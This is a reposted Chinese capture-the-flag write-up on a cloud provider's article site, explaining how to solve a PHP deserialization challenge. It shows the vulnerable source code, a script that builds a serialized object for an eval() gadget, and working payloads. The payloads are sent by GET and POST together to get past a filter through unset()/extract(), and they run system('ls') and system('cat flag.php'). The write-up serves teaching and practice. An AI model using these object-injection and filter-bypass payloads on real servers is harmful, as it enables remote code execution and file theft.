活动

天翼云最新优惠活动,涵盖免费试用,产品折扣等,助您降本增效!
热门活动
  • 免费体验DeepSeek,上天翼云息壤 NEW 新老用户均可免费体验2500万Tokens,限时两周
  • 云上钜惠 HOT 爆款云主机全场特惠,更有万元锦鲤券等你来领!
  • 算力套餐 HOT 让算力触手可及
  • 天翼云脑AOne NEW 连接、保护、办公,All-in-One!
  • 一键部署Llama3大模型学习机 0代码一键部署,预装最新主流大模型Llama3与StableDiffusion
  • 中小企业应用上云专场 产品组合下单即享折上9折起,助力企业快速上云
  • 息壤高校钜惠活动 NEW 天翼云息壤杯高校AI大赛,数款产品享受线上订购超值特惠
  • 天翼云电脑专场 HOT 移动办公新选择,爆款4核8G畅享1年3.5折起,快来抢购!
  • 天翼云奖励推广计划 加入成为云推官,推荐新用户注册下单得现金奖励
免费活动
  • 免费试用中心 HOT 多款云产品免费试用,快来开启云上之旅
  • 天翼云用户体验官 NEW 您的洞察,重塑科技边界

智算服务

打造统一的产品能力,实现算网调度、训练推理、技术架构、资源管理一体化智算服务
智算云(DeepSeek专区)
科研助手
  • 算力商城
  • 应用商城
  • 开发机
  • 并行计算
算力互联调度平台
  • 应用市场
  • 算力市场
  • 算力调度推荐
一站式智算服务平台
  • 模型广场
  • 体验中心
  • 服务接入
智算一体机
  • 智算一体机
大模型
  • DeepSeek-R1-昇腾版(671B)
  • DeepSeek-R1-英伟达版(671B)
  • DeepSeek-V3-昇腾版(671B)
  • DeepSeek-R1-Distill-Llama-70B
  • DeepSeek-R1-Distill-Qwen-32B
  • Qwen2-72B-Instruct
  • StableDiffusion-V2.1
  • TeleChat-12B

应用商城

天翼云精选行业优秀合作伙伴及千余款商品,提供一站式云上应用服务
进入甄选商城进入云市场创新解决方案
办公协同
  • WPS云文档
  • 安全邮箱
  • EMM手机管家
  • 智能商业平台
财务管理
  • 工资条
  • 税务风控云
企业应用
  • 翼信息化运维服务
  • 翼视频云归档解决方案
工业能源
  • 智慧工厂_生产流程管理解决方案
  • 智慧工地
建站工具
  • SSL证书
  • 新域名服务
网络工具
  • 翼云加速
灾备迁移
  • 云管家2.0
  • 翼备份
资源管理
  • 全栈混合云敏捷版(软件)
  • 全栈混合云敏捷版(一体机)
行业应用
  • 翼电子教室
  • 翼智慧显示一体化解决方案

合作伙伴

天翼云携手合作伙伴,共创云上生态,合作共赢
天翼云生态合作中心
  • 天翼云生态合作中心
天翼云渠道合作伙伴
  • 天翼云代理渠道合作伙伴
天翼云服务合作伙伴
  • 天翼云集成商交付能力认证
天翼云应用合作伙伴
  • 天翼云云市场合作伙伴
  • 天翼云甄选商城合作伙伴
天翼云技术合作伙伴
  • 天翼云OpenAPI中心
  • 天翼云EasyCoding平台
天翼云培训认证
  • 天翼云学堂
  • 天翼云市场商学院
天翼云合作计划
  • 云汇计划
天翼云东升计划
  • 适配中心
  • 东升计划
  • 适配互认证

开发者

开发者相关功能入口汇聚
技术社区
  • 专栏文章
  • 互动问答
  • 技术视频
资源与工具
  • OpenAPI中心
开放能力
  • EasyCoding敏捷开发平台
培训与认证
  • 天翼云学堂
  • 天翼云认证
魔乐社区
  • 魔乐社区

支持与服务

为您提供全方位支持与服务,全流程技术保障,助您轻松上云,安全无忧
文档与工具
  • 文档中心
  • 新手上云
  • 自助服务
  • OpenAPI中心
定价
  • 价格计算器
  • 定价策略
基础服务
  • 售前咨询
  • 在线支持
  • 在线支持
  • 工单服务
  • 建议与反馈
  • 用户体验官
  • 服务保障
  • 客户公告
  • 会员中心
增值服务
  • 红心服务
  • 首保服务
  • 客户支持计划
  • 专家技术服务
  • 备案管家

了解天翼云

天翼云秉承央企使命,致力于成为数字经济主力军,投身科技强国伟大事业,为用户提供安全、普惠云服务
品牌介绍
  • 关于天翼云
  • 智算云
  • 天翼云4.0
  • 新闻资讯
  • 天翼云APP
基础设施
  • 全球基础设施
  • 信任中心
最佳实践
  • 精选案例
  • 超级探访
  • 云杂志
  • 分析师和白皮书
  • 天翼云·创新直播间
市场活动
  • 2025智能云生态大会
  • 2024智算云生态大会
  • 2023云生态大会
  • 2022云生态大会
  • 天翼云中国行
天翼云
  • 活动
  • 智算服务
  • 产品
  • 解决方案
  • 应用商城
  • 合作伙伴
  • 开发者
  • 支持与服务
  • 了解天翼云
      • 文档
      • 控制中心
      • 备案
      • 管理中心

      HashTeam web_浑元形意 writeup

      首页 知识中心 其他 文章详情页

      HashTeam web_浑元形意 writeup

      2025-05-19 09:04:14 阅读次数:2

      GET,shell,序列化

      HashTeam web_浑元形意

      原题链接

      key:PHP代码审计+反序列化

      ①进入环境

      往下滑发现了php代码,有点小多.......

       <?php
          class hashteam {
              var $test;
              function __construct() {
                  $this->test = new Orbic();
              }
              function __destruct() {
                  $this->test->action();
              }
          }
      
          class Orbic {
              function action() {
                  echo "Orbic";
              }
          }
      
          class Qu4ck {
              var $test2;
              function action() {
                  eval($this->test2);
              }
          }
      
          function filter($input){
              if(preg_match("/[A-Za-z0-9_$]+/",$input)){
                  die("不讲武德!!!");
              }else{
                  return $input;
              }
          }
      
          foreach (array('_POST','_GET')as $k){
              if($$k){
                  foreach($$k as $key=>$value){
                      if(isset($$key)&&$$key==$value)
                          unset($$key);
                  }
              }
          }
          if(isset($_GET['shell']))$_GET['shell']=filter($_GET['shell']);
          if($_POST)extract($_POST,EXTR_SKIP);
          if($_GET)extract($_GET,EXTR_SKIP);
          if(isset($_GET['shell'])){
              $shell=$_GET['shell'];
              $class=new hashteam();
              unserialize($shell);
              echo "大E了没有闪";
          }
       ?> 

       

      ②这里首先定义了三个类hashteam、Orbic、Qu4ck

      hashteam类中定义了临时变量test,然后调用了两个魔法函数,构造函数用test创建一个Orbic类,析构函数会调用Orbic类里的action()从而输出"Orbic"

      这里的魔法函数如下:

      构造函数__construct():当new出新对象时会自动调用,但在反序列化unserialize()时是不会自动调用的。

      析构函数__destruct():当对象被销毁时会自动调用。

      Orbic类里只定义了一个action()函数,后者只是单纯地输出字符串"Orbic"

      Qu4ck类定义了变量test2,然后定义函数action(),注意这里有个eval(),意味着可以用eval()拿shell

       

      ③代码的最后创建了hashteam类,肯定会自动调用一系列魔法函数

      并且出现了反序列化unserialize(),给了我们去Qu4ck中拿shell的可能,所以我们需要自己去对这些类进行重构从而去执行eval()

      这里的操作方法也很简单,因为hashteam类里面给test赋值的是Orbic类,想要执行Qu4ck中的action()只需要给test赋值Qu4ck类即可,具体代码如下:

      <?php
          class hashteam {
              var $test;
              function __construct() {
                  $this->test = new Qu4ck(); //将Orbic换成Qu4ck
              }
          }
          class Qu4ck {
          var $test2 = "system('ls');"; //ls列出目录下所有文件名
          }
          echo serialize(new hashteam());
      ?>
      

      上述代码序列化后结果为👇

      O:8:"hashteam":1:{s:4:"test";O:5:"Qu4ck":1:{s:5:"test2";s:13:"system('ls');";}}

      这便是我们要传递的参数shell,题目中再反序列化unserialize()回来,我们就实现了类的重构并获得了目录下所有文件名

      问题显然并没有这么简单(不然中间那一坨代码是干嘛的......)

       

      ④中间代码长这样式的👇

      if(isset($_GET['shell']))$_GET['shell']=filter($_GET['shell']);
      if($_POST)extract($_POST,EXTR_SKIP);
      if($_GET)extract($_GET,EXTR_SKIP);
      if(isset($_GET['shell'])){
      $shell=$_GET['shell'];
      $class=new hashteam();
      unserialize($shell);
      echo "大E了没有闪";

      首先将GET提交的shell内容经过filter()过滤,filter()定义如下👇

      function filter($input){
          if(preg_match("/[A-Za-z0-9_$]+/",$input)){
              die("不讲武德!!!");
          }else{
              return $input;
          }
      } 

      可见,filter()会过滤所有的字母数字还有下划线以及$等符号

      然后对POST数组和GET数组中的内容分别进行extract()

      extract(,EXTR_SKIP)把数组中的键名直接注册为了变量,比如把$_POST[ai]直接注册为了$ai

      最后如果GET数组中仍有shell内容就可以执行我们刚才的payload

      所以这里如果我们直接提交payload肯定会被过滤掉,那该如何操作呢

      想起来中间有一段代码我们还没用到👇

      foreach (array('_POST','_GET')as $k){
          if($$k){                          //$$k=$_POST
              foreach($$k as $key=>$value){ //用$_POST传的参数作为键名和键值
                  if(isset($$key)&&$$key==$value)
                      unset($$key);         //销毁变量
              }
          }
      }

      如果我们先把我们GET里的内容unset()销毁掉,然后再利用别的方法传回去不就好了

      我们需要unset($_GET[shell]),那么键名$key就为_GET[shell]

      这里我们只需要用之前没有用到的$_POST,使用POST方法提交_GET[shell]=O:8:"hashteam":1:{s:4:"test";O:5:"Qu4ck":1:{s:5:"test2";s:13:"system('ls');";}}

      这样就可以成功把$_GET销毁,绕过filter()

      销毁后,再利用extract()函数通过extract($_POST,EXTR_SKIP)还原出$_GET[shell]

       

      ⑤最终我们同时通过GET方法和POST方法同时提交相同的内容来进行操作

      GET提交?shell=O:8:"hashteam":1:{s:4:"test";O:5:"Qu4ck":1:{s:5:"test2";s:13:"system('ls');";}}

      POST提交_GET[shell]=O:8:"hashteam":1:{s:4:"test";O:5:"Qu4ck":1:{s:5:"test2";s:13:"system('ls');";}}

      HashTeam web_浑元形意 writeup

      得到了目录下所有文件名👇

      HashTeam web_浑元形意 writeup

      看到了flag.php

      ⑥需要想办法打开flag.php

      肯定不能是直接在网址后面输入/flag.php来打开啊

      我们还是要用上面的方法,把指令藏在类重构里,序列化后再次传参

      GET提交?shell=O:8:"hashteam":1:{s:4:"test";O:5:"Qu4ck":1:{s:5:"test2";s:23:"system('cat flag.php');";}}

      POST提交_GET[shell]=O:8:"hashteam":1:{s:4:"test";O:5:"Qu4ck":1:{s:5:"test2";s:23:"system('cat flag.php');";}}

      在源代码里找到flag

      这道题是根据上海市比赛的“千毒网盘”的unset和extract的组合题改编的,更多内容可以访问千毒网盘wp

      关于序列化和反序列化,更过内容可以访问反序列化漏洞+例题

      版权声明:本文内容来自第三方投稿或授权转载,原文地址:https://blog.csdn.net/Mitchell_Donovan/article/details/111970527,作者:Mitch311,版权归原作者所有。本网站转在其作品的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如因作品内容、版权等问题需要同本网站联系,请发邮件至ctyunbbs@chinatelecom.cn沟通。

      上一篇:jQuery遍历对象、数组、集合

      下一篇:gray_dilation_rect

      相关文章

      2025-05-14 10:33:16

      30天拿下Python之使用Json

      Json的英文全称为JavaScript Object Notation,中文为JavaScript对象表示法,是一种存储和交换文本信息的语法,类似XML。Json作为轻量级的文本数据交换格式,比XML更小、更快,更易解析,也更易于阅读和编写。

      2025-05-14 10:33:16
      json , Json , Python , 字符串 , 对象 , 序列化 , 转换
      2025-05-13 09:49:27

      shell基础_shell实践

      shell基础_shell实践

      2025-05-13 09:49:27
      shell , 分类 , 实践 , 方式
      2025-05-13 09:49:27

      shell基础_shell简介

      shell基础_shell简介

      2025-05-13 09:49:27
      shell , 学习 , 小结 , 简介 , 语言 , 运维
      2025-05-13 09:49:27

      全局变量_嵌套shell

      全局变量_嵌套shell

      2025-05-13 09:49:27
      export , shell , 原理 , 学习 , 实践 , 嵌套
      2025-05-13 09:49:19

      内置变量_脚本相关

      内置变量_脚本相关

      2025-05-13 09:49:19
      shell , 实践 , 当前 , 执行 , 脚本 , 获取
      2025-05-13 09:49:19

      脚本交互_基础知识_子shell基础

      脚本交互_基础知识_子shell基础

      2025-05-13 09:49:19
      shell , 基础知识 , 学习 , 实践 , 简单
      2025-05-13 09:49:19

      脚本交互_基础知识_shell登录解读

      脚本交互_基础知识_shell登录解读

      2025-05-13 09:49:19
      shell , 基础知识 , 实践 , 效果 , 登录 , 配置文件
      2025-05-08 09:03:38

      剑指 Offer 44. 数字序列中某一位的数字

      剑指 Offer 44. 数字序列中某一位的数字

      2025-05-08 09:03:38
      序列 , 序列化 , 数字 , 示例
      2025-05-08 09:03:29

      Java序列化有什么作用

      对java对象进行序列化之后,会变成字节码,这样就会比较方便在网络上进行传输,也可以在磁盘上进行存储。

      2025-05-08 09:03:29
      对象 , 序列化 , 接口 , 构造函数
      2025-04-22 09:40:08

      通过java调用shell脚本实现服务的重启

      通过java调用shell脚本实现服务的重启

      2025-04-22 09:40:08
      shell , 服务 , 脚本 , 调用
      查看更多
      推荐标签

      作者介绍

      天翼云小翼
      天翼云用户

      文章

      33564

      阅读量

      5016080

      查看更多

      最新文章

      剑指 Offer 44. 数字序列中某一位的数字

      2025-05-08 09:03:38

      通过java调用shell脚本实现服务的重启

      2025-04-22 09:40:08

      curl get,post, patch,delete请求封装

      2025-03-31 08:50:08

      【linux】linux环境变量|删除|添加|shell父子环境变量传递

      2025-03-21 06:57:11

      【shell】遍历目录及其子目录中的所有文件|判断文件是否有修改

      2025-03-21 06:56:59

      【Shell】Shell时间相关|统计Shell脚本执行时间|sleep

      2025-03-21 06:56:59

      查看更多

      热门文章

      linux快速重启java jar文件的shell命令

      2023-05-08 10:00:50

      【JAVA SE】—— 文件IO流 (经常忘记的知识点总结)

      2023-05-12 07:21:43

      Linux脚本练习之script064-去掉空行

      2023-05-23 08:16:12

      bash获得相对路径的文件信息

      2023-04-19 09:39:07

      shell 大小写

      2023-03-22 09:03:11

      shell 循环

      2023-04-25 10:20:45

      查看更多

      热门标签

      linux java python javascript 数组 前端 docker Linux vue 函数 shell git 节点 容器 示例
      查看更多

      相关产品

      弹性云主机

      随时自助获取、弹性伸缩的云服务器资源

      天翼云电脑(公众版)

      便捷、安全、高效的云电脑服务

      对象存储

      高品质、低成本的云上存储服务

      云硬盘

      为云上计算资源提供持久性块存储

      查看更多

      随机文章

      shell 微调加载

      序列化和反序列化的原理

      go环境+ip本地库统计ip归属地

      Shell脚本之IP验证

      Linux脚本练习之script073-去掉不需要的单词

      Shell 运算符

      • 7*24小时售后
      • 无忧退款
      • 免费备案
      • 专家服务
      售前咨询热线
      400-810-9889转1
      关注天翼云
      • 权益商城
      • 天翼云APP
      • 天翼云微信公众号
      服务与支持
      • 备案中心
      • 售前咨询
      • 智能客服
      • 自助服务
      • 工单管理
      • 客户公告
      • 涉诈举报
      账户管理
      • 管理中心
      • 订单管理
      • 余额管理
      • 发票管理
      • 充值汇款
      • 续费管理
      快速入口
      • 权益商城
      • 文档中心
      • 最新活动
      • 免费试用
      • 信任中心
      • 天翼云学堂
      云网生态
      • 甄选商城
      • 渠道合作
      • 云市场合作
      了解天翼云
      • 关于天翼云
      • 天翼云APP
      • 服务案例
      • 新闻资讯
      • 联系我们
      热门产品
      • 云电脑
      • 弹性云主机
      • 云电脑政企版
      • 天翼云手机
      • 云数据库
      • 对象存储
      • 云硬盘
      • Web应用防火墙
      • 服务器安全卫士
      • CDN加速
      热门推荐
      • 云服务备份
      • 边缘安全加速平台
      • 全站加速
      • 安全加速
      • 云服务器
      • 云主机
      • 智能边缘云
      • 应用编排服务
      • 微服务引擎
      • 共享流量包
      更多推荐
      • web应用防火墙
      • 密钥管理
      • 等保咨询
      • 安全专区
      • 应用运维管理
      • 云日志服务
      • 文档数据库服务
      • 云搜索服务
      • 数据湖探索
      • 数据仓库服务
      友情链接
      • 中国电信集团
      • 189邮箱
      • 天翼企业云盘
      • 天翼云盘
      ©2025 天翼云科技有限公司版权所有 增值电信业务经营许可证A2.B1.B2-20090001
      公司地址:北京市东城区青龙胡同甲1号、3号2幢2层205-32室
      • 用户协议
      • 隐私政策
      • 个人信息保护
      • 法律声明
      备案 京公网安备11010802043424号 京ICP备 2021034386号